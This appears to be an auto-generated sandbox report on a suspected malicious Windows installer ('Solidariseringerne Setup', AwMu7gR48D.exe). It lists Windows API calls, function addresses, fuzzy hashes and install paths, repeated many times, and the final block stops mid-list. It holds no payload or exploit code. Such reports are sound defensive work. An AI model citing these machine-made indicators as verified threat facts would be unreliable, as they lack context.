Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction ID: 4179e0c76098f610a2fd9102cb0c328980851925f4446f1dd22fc868df860445
Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction Fuzzy Hash: 8CE0EC32A1425EABDF109E659C00EEB7BBCEB05760F048432FD15E3150D235F921DBA9

Function 00405B6F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040313E,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405B83

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction ID: af6d97e9b78343fe008ce3e7999d984a763d513ea29e4df05d500f045cbeb3ca
Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction Fuzzy Hash: B2E0EC3262425AABDF509E559C00AEB7BACEB05360F008436FD15E2151D635F8219FA5

Function 00405DB5 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E43,?,?,?,?,00000002,: Completed), ref: 00405DD9

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction ID: 1bb1e450acb1cec7aaebab1a7e88d6b79e3e17733f6ed9cfc6e3f6d6de5b0954
Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction Fuzzy Hash: D9D0123214024EBBDF115F909C05FAB3B2DEF04314F108827FE06A4090D375D530AB65

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
Instruction ID: e41715f0e6a8bf2c44c365c92f64d23a332030a9f95fc047605520203e95b8fc
Opcode Fuzzy Hash: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
Instruction Fuzzy Hash: 9BD012B6708111ABCB10DFA8AA4869D77A49B40325B308137D515F21D0E2B9C9456719

Function 0040403C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(000103FE,00000000,00000000,00000000), ref: 0040404E

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: a420b78244073386fdaf02eaad45271dfd1dc05eac8f2b2552ccdd106ab2ed6e
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: 70C09B717443007BFA31DB509D49F077758A750B00F5584357320F50D0C6B4E451D62D

Function 00403173 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 00403181

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 00405611 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExA.SHELL32(?,00404415,?), ref: 00405620

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A

Function 00404025 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Function 00404012 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403DEE), ref: 0040401C

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A

Function 00401EDB Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

Part of subcall function 004055CE: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
Part of subcall function 004055CE: CloseHandle.KERNEL32(?), ref: 00405604

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F20

Part of subcall function 0040633C: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040634D
Part of subcall function 0040633C: GetExitCodeProcess.KERNEL32(?,?), ref: 0040636F

Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
Instruction ID: 17f7953f0d5b7b21d2e535c202f5bbb1bf051249d0315c8d96c64ca666d5043c
Opcode Fuzzy Hash: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
Instruction Fuzzy Hash: FCF0BB71A05121ABCB20BF654D495EF66A4DF81314B10057BFA01B21D1C77C4E4146BE

Non-executed Functions

Function 004049D3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049EB
GetDlgItem.USER32(?,00000408), ref: 004049F6
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A40
LoadBitmapA.USER32(0000006E), ref: 00404A53
SetWindowLongA.USER32(?,000000FC,00404FCA), ref: 00404A6C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A80
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A92
SendMessageA.USER32(?,00001109,00000002), ref: 00404AA8
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AB4
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AC6
DeleteObject.GDI32(00000000), ref: 00404AC9
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404AF4
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B00
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B95
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BC0
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD4
GetWindowLongA.USER32(?,000000F0), ref: 00404C03
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C11
ShowWindow.USER32(?,00000005), ref: 00404C22
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D1F
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D84
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D99
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DBD
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DDD
ImageList_Destroy.COMCTL32(00000000), ref: 00404DF2
GlobalFree.KERNEL32(00000000), ref: 00404E02
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E7B
SendMessageA.USER32(?,00001102,?,?), ref: 00404F24
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F33
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F53
ShowWindow.USER32(?,00000000), ref: 00404FA1
GetDlgItem.USER32(?,000003FE), ref: 00404FAC
ShowWindow.USER32(00000000), ref: 00404FB3

Strings

N, xrefs: 00404C5D
, xrefs: 00404F8B
M, xrefs: 00404B7C

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
Instruction ID: 4638a2be7f0938753f9a717370e01017d92af631219061991dd3498ab54a35db
Opcode Fuzzy Hash: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
Instruction Fuzzy Hash: 60027EB0900209AFEF109F54DC85AAE7BB5FB84315F10817AF615BA2E1C7789E42DF58

Function 00404460 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004044AF
SetWindowTextA.USER32(00000000,?), ref: 004044D9
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 0040458A
CoTaskMemFree.OLE32(00000000), ref: 00404595
lstrcmpiA.KERNEL32(: Completed,Solidariseringerne Setup: Completed), ref: 004045C7
lstrcatA.KERNEL32(?,: Completed), ref: 004045D3
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045E5

Part of subcall function 0040562F: GetDlgItemTextA.USER32(?,?,00000400,0040461C), ref: 00405642

Part of subcall function 00406199: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\AwMu7gR48D.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
Part of subcall function 00406199: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
Part of subcall function 00406199: CharNextA.USER32(?,"C:\Users\user\Desktop\AwMu7gR48D.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
Part of subcall function 00406199: CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046A3
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046BE

Part of subcall function 00404817: lstrlenA.KERNEL32(Solidariseringerne Setup: Completed,Solidariseringerne Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
Part of subcall function 00404817: wsprintfA.USER32 ref: 004048BD
Part of subcall function 00404817: SetDlgItemTextA.USER32(?,Solidariseringerne Setup: Completed), ref: 004048D0

Strings

: Completed, xrefs: 004045C1, 004045C6, 004045D1
C:\Users\user\AppData\Local\unshabbily, xrefs: 004045B0
Solidariseringerne Setup: Completed, xrefs: 0040455D, 004045C0
A, xrefs: 00404583

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\unshabbily$Solidariseringerne Setup: Completed
API String ID: 2624150263-741290309
Opcode ID: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
Instruction ID: 5dd75e317128adb7bedb8be6abecdb1ea93c725c3d3faa56fa834c848e6f6950
Opcode Fuzzy Hash: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
Instruction Fuzzy Hash: 4BA19FF1900209ABDB11AFA5CC45BAFB7B8EF85314F10843BF611B62D1DB7C99418B69

Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC

Strings

C:\Users\user\AppData\Local\unshabbily\Hardwire, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\unshabbily\Hardwire
API String ID: 123533781-3099227325
Opcode ID: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
Instruction ID: 27b6dc01e21a21dcf175964b2ce54e528eb66c3f275abda499c4f6713b6e0615
Opcode Fuzzy Hash: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
Instruction Fuzzy Hash: 355136B5A00208BFCF10DFE4C988A9DBBB5EF48314F2045AAF915EB2D1DA799941CF54

Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
